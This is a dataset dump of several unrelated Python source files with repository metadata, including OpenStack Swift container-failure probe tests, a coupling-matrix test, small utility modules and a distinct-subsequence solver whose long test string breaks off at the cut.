] | 23 | 2021-10-14T02:31:06.000Z | 2022-01-25T16:26:44.000Z | EEG_Lightning/dassl/data/__init__.py | mcd4874/NeurIPS_competition | 4df1f222929e9824a55c9c4ae6634743391b0fe9 | [
"MIT"
] | null | null | null | EEG_Lightning/dassl/data/__init__.py | mcd4874/NeurIPS_competition | 4df1f222929e9824a55c9c4ae6634743391b0fe9 | [
"MIT"
] | 1 | 2022-03-05T06:54:11.000Z | 2022-03-05T06:54:11.000Z | from .data_manager import DataManager
from .data_manager import MultiDomainDataManager
| 29 | 48 | 0.885057 | 10 | 87 | 7.5 | 0.6 | 0.213333 | 0.4 | 0.56 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091954 | 87 | 2 | 49 | 43.5 | 0.949367 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
005ece6290dbc9ead9017d195a54315d0111ff28 | 18,745 | py | Python | test/probe/test_container_failures.py | ivancich/ceph-swift-fork | c4f7bd09346716c6e934a3a8122928fdbe3a6dc2 | [
"Apache-2.0"
] | 3 | 2017-12-02T23:19:01.000Z | 2018-05-18T07:03:52.000Z | test/probe/test_container_failures.py | ivancich/ceph-swift-fork | c4f7bd09346716c6e934a3a8122928fdbe3a6dc2 | [
"Apache-2.0"
] | 4 | 2017-02-08T20:10:45.000Z | 2018-05-18T13:03:07.000Z | test/probe/test_container_failures.py | ivancich/ceph-swift-fork | c4f7bd09346716c6e934a3a8122928fdbe3a6dc2 | [
"Apache-2.0"
] | 14 | 2015-04-06T17:41:25.000Z | 2020-09-24T02:01:24.000Z | #!/usr/bin/python -u
# Copyright (c) 2010-2011 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import os
from os import kill
from signal import SIGTERM
from subprocess import Popen
from time import sleep
from uuid import uuid4
import eventlet
import sqlite3
from swift.common import client, direct_client
from swift.common.utils import hash_path, readconf
from test.probe.common import get_to_final_state, kill_pids, reset_environment
class TestContainerFailures(unittest.TestCase):
def setUp(self):
self.pids, self.port2server, self.account_ring, self.container_ring, \
self.object_ring, self.url, self.token, self.account = \
reset_environment()
def tearDown(self):
kill_pids(self.pids)
def test_first_node_fail(self):
container = 'container-%s' % uuid4()
client.put_container(self.url, self.token, container)
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
object1 = 'object1'
client.put_object(self.url, self.token, container, object1, 'test')
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
self.assert_(object1 in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
cpart, cnodes = self.container_ring.get_nodes(self.account, container)
kill(self.pids[self.port2server[cnodes[0]['port']]], SIGTERM)
client.delete_object(self.url, self.token, container, object1)
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
self.assert_(object1 not in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
self.pids[self.port2server[cnodes[0]['port']]] = \
Popen(['swift-container-server',
'/etc/swift/container-server/%d.conf' %
((cnodes[0]['port'] - 6001) / 10)]).pid
sleep(2)
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
# This okay because the first node hasn't got the update that the
# object was deleted yet.
self.assert_(object1 in [o['name'] for o in
direct_client.direct_get_container(cnodes[0], cpart,
self.account, container)[1]])
# Unfortunately, the following might pass or fail, depending on the
# position of the account server associated with the first container
# server we had killed. If the associated happens to be the first
# account server, this'll pass, otherwise the first account server will
# serve the listing and not have the container.
# self.assert_(container in [c['name'] for c in
# client.get_account(self.url, self.token)[1]])
object2 = 'object2'
# This will work because at least one (in this case, just one) account
# server has to indicate the container exists for the put to continue.
client.put_object(self.url, self.token, container, object2, 'test')
# First node still doesn't know object1 was deleted yet; this is okay.
self.assert_(object1 in [o['name'] for o in
direct_client.direct_get_container(cnodes[0], cpart,
self.account, container)[1]])
# And, of course, our new object2 exists.
self.assert_(object2 in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
get_to_final_state()
# Our container delete never "finalized" because we started using it
# before the delete settled.
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
# And, so our object2 should still exist and object1's delete should
# have finalized.
self.assert_(object1 not in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
self.assert_(object2 in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
def test_second_node_fail(self):
container = 'container-%s' % uuid4()
client.put_container(self.url, self.token, container)
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
object1 = 'object1'
client.put_object(self.url, self.token, container, object1, 'test')
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
self.assert_(object1 in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
cpart, cnodes = self.container_ring.get_nodes(self.account, container)
kill(self.pids[self.port2server[cnodes[1]['port']]], SIGTERM)
client.delete_object(self.url, self.token, container, object1)
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
self.assert_(object1 not in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
self.pids[self.port2server[cnodes[1]['port']]] = \
Popen(['swift-container-server',
'/etc/swift/container-server/%d.conf' %
((cnodes[1]['port'] - 6001) / 10)]).pid
sleep(2)
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
self.assert_(object1 not in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
# Unfortunately, the following might pass or fail, depending on the
# position of the account server associated with the first container
# server we had killed. If the associated happens to be the first
# account server, this'll pass, otherwise the first account server will
# serve the listing and not have the container.
# self.assert_(container in [c['name'] for c in
# client.get_account(self.url, self.token)[1]])
object2 = 'object2'
# This will work because at least one (in this case, just one) account
# server has to indicate the container exists for the put to continue.
client.put_object(self.url, self.token, container, object2, 'test')
self.assert_(object1 not in [o['name'] for o in
direct_client.direct_get_container(cnodes[0], cpart,
self.account, container)[1]])
# And, of course, our new object2 exists.
self.assert_(object2 in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
get_to_final_state()
# Our container delete never "finalized" because we started using it
# before the delete settled.
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
# And, so our object2 should still exist and object1's delete should
# have finalized.
self.assert_(object1 not in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
self.assert_(object2 in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
def test_first_two_nodes_fail(self):
container = 'container-%s' % uuid4()
client.put_container(self.url, self.token, container)
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
object1 = 'object1'
client.put_object(self.url, self.token, container, object1, 'test')
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
self.assert_(object1 in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
cpart, cnodes = self.container_ring.get_nodes(self.account, container)
for x in xrange(2):
kill(self.pids[self.port2server[cnodes[x]['port']]], SIGTERM)
client.delete_object(self.url, self.token, container, object1)
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
self.assert_(object1 not in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
for x in xrange(2):
self.pids[self.port2server[cnodes[x]['port']]] = \
Popen(['swift-container-server',
'/etc/swift/container-server/%d.conf' %
((cnodes[x]['port'] - 6001) / 10)]).pid
sleep(2)
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
# This okay because the first node hasn't got the update that the
# object was deleted yet.
self.assert_(object1 in [o['name'] for o in
direct_client.direct_get_container(cnodes[0], cpart,
self.account, container)[1]])
# This fails because all three nodes have to indicate deletion before
# we tell the user it worked. Since the first node 409s (it hasn't got
# the update that the object was deleted yet), the whole must 503
# (until every is synced up, then the delete would work).
exc = None
try:
client.delete_container(self.url, self.token, container)
except client.ClientException, err:
exc = err
self.assert_(exc)
self.assert_(exc.http_status, 503)
# Unfortunately, the following might pass or fail, depending on the
# position of the account server associated with the first container
# server we had killed. If the associated happens to be the first
# account server, this'll pass, otherwise the first account server will
# serve the listing and not have the container.
# self.assert_(container in [c['name'] for c in
# client.get_account(self.url, self.token)[1]])
object2 = 'object2'
# This will work because at least one (in this case, just one) account
# server has to indicate the container exists for the put to continue.
client.put_object(self.url, self.token, container, object2, 'test')
# First node still doesn't know object1 was deleted yet; this is okay.
self.assert_(object1 in [o['name'] for o in
direct_client.direct_get_container(cnodes[0], cpart,
self.account, container)[1]])
# And, of course, our new object2 exists.
self.assert_(object2 in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
get_to_final_state()
# Our container delete never "finalized" because we started using it
# before the delete settled.
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
# And, so our object2 should still exist and object1's delete should
# have finalized.
self.assert_(object1 not in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
self.assert_(object2 in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
def test_last_two_nodes_fail(self):
container = 'container-%s' % uuid4()
client.put_container(self.url, self.token, container)
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
object1 = 'object1'
client.put_object(self.url, self.token, container, object1, 'test')
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
self.assert_(object1 in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
cpart, cnodes = self.container_ring.get_nodes(self.account, container)
for x in (1, 2):
kill(self.pids[self.port2server[cnodes[x]['port']]], SIGTERM)
client.delete_object(self.url, self.token, container, object1)
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
self.assert_(object1 not in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
for x in (1, 2):
self.pids[self.port2server[cnodes[x]['port']]] = \
Popen(['swift-container-server',
'/etc/swift/container-server/%d.conf' %
((cnodes[x]['port'] - 6001) / 10)]).pid
sleep(2)
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
self.assert_(object1 not in [o['name'] for o in
direct_client.direct_get_container(cnodes[0], cpart,
self.account, container)[1]])
# This fails because all three nodes have to indicate deletion before
# we tell the user it worked. Since the first node 409s (it hasn't got
# the update that the object was deleted yet), the whole must 503
# (until every is synced up, then the delete would work).
exc = None
try:
client.delete_container(self.url, self.token, container)
except client.ClientException, err:
exc = err
self.assert_(exc)
self.assert_(exc.http_status, 503)
# Unfortunately, the following might pass or fail, depending on the
# position of the account server associated with the first container
# server we had killed. If the associated happens to be the first
# account server, this'll pass, otherwise the first account server will
# serve the listing and not have the container.
# self.assert_(container in [c['name'] for c in
# client.get_account(self.url, self.token)[1]])
object2 = 'object2'
# This will work because at least one (in this case, just one) account
# server has to indicate the container exists for the put to continue.
client.put_object(self.url, self.token, container, object2, 'test')
self.assert_(object1 not in [o['name'] for o in
direct_client.direct_get_container(cnodes[0], cpart,
self.account, container)[1]])
# And, of course, our new object2 exists.
self.assert_(object2 in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
get_to_final_state()
# Our container delete never "finalized" because we started using it
# before the delete settled.
self.assert_(container in [c['name'] for c in
client.get_account(self.url, self.token)[1]])
# And, so our object2 should still exist and object1's delete should
# have finalized.
self.assert_(object1 not in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
self.assert_(object2 in [o['name'] for o in
client.get_container(self.url, self.token, container)[1]])
def _get_db_file_path(self, obj_dir):
files = sorted(os.listdir(obj_dir), reverse=True)
for file in files:
if file.endswith('db'):
return os.path.join(obj_dir, file)
def _get_container_db_files(self, container):
opart, onodes = self.container_ring.get_nodes(self.account, container)
onode = onodes[0]
db_files = []
for onode in onodes:
node_id = (onode['port'] - 6000) / 10
device = onode['device']
hash_str = hash_path(self.account, container)
server_conf = readconf('/etc/swift/container-server/%s.conf' %
node_id)
devices = server_conf['app:container-server']['devices']
obj_dir = '%s/%s/containers/%s/%s/%s/' % (devices,
device, opart,
hash_str[-3:], hash_str)
db_files.append(self._get_db_file_path(obj_dir))
return db_files
def test_locked_container_dbs(self):
def run_test(num_locks, catch_503):
container = 'container-%s' % uuid4()
client.put_container(self.url, self.token, container)
db_files = self._get_container_db_files(container)
db_conns = []
for i in range(num_locks):
db_conn = sqlite3.connect(db_files[i])
db_conn.execute('begin exclusive transaction')
db_conns.append(db_conn)
if catch_503:
try:
client.delete_container(self.url, self.token, container)
except client.ClientException, e:
self.assertEquals(e.http_status, 503)
else:
client.delete_container(self.url, self.token, container)
pool = eventlet.GreenPool()
try:
with eventlet.Timeout(15):
p = pool.spawn(run_test, 1, False)
r = pool.spawn(run_test, 2, True)
q = pool.spawn(run_test, 3, True)
pool.waitall()
except eventlet.Timeout, e:
raise Exception(
"The server did not return a 503 on container db locks, "
"it just hangs: %s" % e)
if __name__ == '__main__':
unittest.main()
| 48.311856 | 79 | 0.603574 | 2,470 | 18,745 | 4.478543 | 0.111741 | 0.042397 | 0.066624 | 0.096908 | 0.825077 | 0.823811 | 0.823811 | 0.82345 | 0.815223 | 0.815223 | 0 | 0.018104 | 0.289837 | 18,745 | 387 | 80 | 48.436693 | 0.812876 | 0.239104 | 0 | 0.709804 | 0 | 0 | 0.058048 | 0.020384 | 0 | 0 | 0 | 0 | 0.207843 | 0 | null | null | 0 | 0.047059 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
00c66bc8a3747d0391984ba2e404f4c38bc839b2 | 122 | py | Python | ELAB01/01-10.py | tawanchaiii/01204111_63 | edf1174f287f5174d93729d9b5c940c74d3b6553 | [
"WTFPL"
] | null | null | null | ELAB01/01-10.py | tawanchaiii/01204111_63 | edf1174f287f5174d93729d9b5c940c74d3b6553 | [
"WTFPL"
] | null | null | null | ELAB01/01-10.py | tawanchaiii/01204111_63 | edf1174f287f5174d93729d9b5c940c74d3b6553 | [
"WTFPL"
] | null | null | null | s = int(input("s: "))
print(f"{s} seconds equals {s//3600} hour(s) {(s%3600)//60} minute(s) and {(s%3600)%60} second(s)") | 61 | 99 | 0.581967 | 24 | 122 | 2.958333 | 0.541667 | 0.211268 | 0.197183 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 0.114754 | 122 | 2 | 99 | 61 | 0.509259 | 0 | 0 | 0 | 0 | 0.5 | 0.754098 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
00f56669aff485f5b7d3069d01d97391f9dcb3fc | 122 | py | Python | stan/dataset_writers/__init__.py | ChristophAlt/StAn | abb115b9f245c66edbb3bb89ee45cdc654a48709 | [
"MIT"
] | 3 | 2019-04-23T08:07:15.000Z | 2020-01-09T07:22:27.000Z | stan/dataset_writers/__init__.py | ChristophAlt/StAn | abb115b9f245c66edbb3bb89ee45cdc654a48709 | [
"MIT"
] | null | null | null | stan/dataset_writers/__init__.py | ChristophAlt/StAn | abb115b9f245c66edbb3bb89ee45cdc654a48709 | [
"MIT"
] | 2 | 2019-06-27T08:40:23.000Z | 2020-01-09T07:22:30.000Z | from stan.dataset_writers.dataset_writer import DatasetWriter
from stan.dataset_writers.tacred import TacredDatasetWriter
| 40.666667 | 61 | 0.901639 | 15 | 122 | 7.133333 | 0.6 | 0.149533 | 0.280374 | 0.411215 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065574 | 122 | 2 | 62 | 61 | 0.938596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
da9f55f625c1411763d48e3523697d0897ec0854 | 168 | py | Python | tests/utils.py | EltonCN/evolvepy | 4489264d6c03ea4f3c23ea665fdf12fe4ead1ccc | [
"MIT"
] | 1 | 2022-01-13T21:11:53.000Z | 2022-01-13T21:11:53.000Z | tests/utils.py | EltonCN/evolvepy | 4489264d6c03ea4f3c23ea665fdf12fe4ead1ccc | [
"MIT"
] | null | null | null | tests/utils.py | EltonCN/evolvepy | 4489264d6c03ea4f3c23ea665fdf12fe4ead1ccc | [
"MIT"
] | null | null | null | from numpy.testing import assert_raises, assert_array_equal
def assert_not_equal(array1, array2):
assert_raises(AssertionError, assert_array_equal, array1, array2) | 42 | 69 | 0.839286 | 23 | 168 | 5.782609 | 0.565217 | 0.180451 | 0.240602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026316 | 0.095238 | 168 | 4 | 69 | 42 | 0.848684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
dad80aa958cb6f2cdc155f4d699f43c3c528c347 | 2,077 | py | Python | test/test.py | gongfan99/coupling_matrix_numpy_extension | 257623f32c3773ce3f038b3305b043518fcff2ec | [
"MIT"
] | 2 | 2020-03-18T09:08:13.000Z | 2020-06-20T03:08:34.000Z | test/test.py | gongfan99/coupling_matrix_numpy_extension | 257623f32c3773ce3f038b3305b043518fcff2ec | [
"MIT"
] | null | null | null | test/test.py | gongfan99/coupling_matrix_numpy_extension | 257623f32c3773ce3f038b3305b043518fcff2ec | [
"MIT"
] | null | null | null | import numpy as np
import couplingmatrix as cp
import CP
import timeit
normalizedFreq = np.arange(-2.5, 2.5, 0.5)
M = np.array([[0.00000,0.44140,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000],
[0.44140,0.75180,0.16820,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000],
[0.00000,0.16820,0.78050,0.12880,0.00000,0.00000,0.00000,0.00000,0.00000],
[0.00000,0.00000,0.12880,0.78280,0.12080,-0.00420,-0.00840,0.00000,0.00000],
[0.00000,0.00000,0.00000,0.12080,0.79140,0.12890,0.00000,0.00000,0.00000],
[0.00000,0.00000,0.00000,-0.00420,0.12890,0.78290,0.12890,0.00000,0.00000],
[0.00000,0.00000,0.00000,-0.00840,0.00000,0.12890,0.78340,0.18000,0.00000],
[0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.18000,0.78280,0.46540],
[0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.46540,0.00000]])
S11_CP, S21_CP = CP.CM2S(M, normalizedFreq)
S11_cp, S21_cp = cp.CM2S(M, normalizedFreq)
np.testing.assert_array_equal(S11_CP, S11_cp)
np.testing.assert_array_equal(S21_CP, S21_cp)
np.allclose(S11_CP, S11_cp)
np.allclose(S21_CP, S21_cp)
setup_str = "import numpy as np; \
import CP; \
import couplingmatrix as cp; \
normalizedFreq = np.arange(-2.5, 2.5, 0.01); \
M = np.array([[0.00000,0.44140,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000], \
[0.44140,0.75180,0.16820,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000], \
[0.00000,0.16820,0.78050,0.12880,0.00000,0.00000,0.00000,0.00000,0.00000], \
[0.00000,0.00000,0.12880,0.78280,0.12080,-0.00420,-0.00840,0.00000,0.00000], \
[0.00000,0.00000,0.00000,0.12080,0.79140,0.12890,0.00000,0.00000,0.00000], \
[0.00000,0.00000,0.00000,-0.00420,0.12890,0.78290,0.12890,0.00000,0.00000], \
[0.00000,0.00000,0.00000,-0.00840,0.00000,0.12890,0.78340,0.18000,0.00000], \
[0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.18000,0.78280,0.46540], \
[0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.00000,0.46540,0.00000]])"
num = 100
print(timeit.timeit('S11, S21 = CP.CM2S(M, normalizedFreq)', setup=setup_str, number=num))
print(timeit.timeit('S11, S21 = cp.CM2S(M, normalizedFreq)', setup=setup_str, number=num)) | 50.658537 | 90 | 0.716418 | 448 | 2,077 | 3.279018 | 0.098214 | 0.441116 | 0.505106 | 0.702519 | 0.918993 | 0.841389 | 0.841389 | 0.841389 | 0.762423 | 0.762423 | 0 | 0.519797 | 0.051517 | 2,077 | 41 | 91 | 50.658537 | 0.225888 | 0 | 0 | 0 | 0 | 0.25 | 0.035611 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 1 | 0 | false | 0 | 0.194444 | 0 | 0.194444 | 0.055556 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
97a835a2882b8f994da369349a9c1376e1a6b352 | 12,652 | py | Python | alrogithm/subseq/a.py | SwordYoung/cutprob | f022b6bc23d80d5d214b54c49f372af49c837855 | [
"Artistic-2.0"
] | null | null | null | alrogithm/subseq/a.py | SwordYoung/cutprob | f022b6bc23d80d5d214b54c49f372af49c837855 | [
"Artistic-2.0"
] | null | null | null | alrogithm/subseq/a.py | SwordYoung/cutprob | f022b6bc23d80d5d214b54c49f372af49c837855 | [
"Artistic-2.0"
] | null | null | null | #!/usr/bin/env python
class Solution:
def getresult(self, i, j):
if self.dictp.has_key((i,j)):
return self.dictp[(i,j)]
if len(self.s) - i < len(self.t) - j:
return 0
if j == len(self.t):
return 1
if i == len(self.s):
return 0
return None
# @return an integer
def numD(self):
i = 0
j = 0
target = [(0,0)]
while target:
i, j = target.pop()
if self.dictp.has_key((i,j)):
continue
new_sub = []
res = 0
if self.s[i] == self.t[j]:
subres = self.getresult(i+1, j+1)
if subres is None:
new_sub.append((i+1, j+1))
else:
res += subres
subres = self.getresult(i+1, j)
if subres is None:
new_sub.append((i+1, j))
assert i+1 < len(self.s)
assert j < len(self.t)
else:
res += subres
if new_sub:
target.append((i,j))
target.extend(new_sub)
else:
self.dictp[(i,j)] = res
return self.dictp[(0,0)]
def numDistinct(self, S, T):
self.dictp = {}
self.s = S
self.t = T
return self.numD()
def test(s, t):
sol = Solution()
res = sol.numDistinct(s, t)
print "input:"
print " ", s
print " ", t
print "res: %d" % (res)
def manual_test():
test("aabbaaabb", "aab")
test("zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzxslledayhxhadmctrliaxqpokyezcfhzaskeykchkmh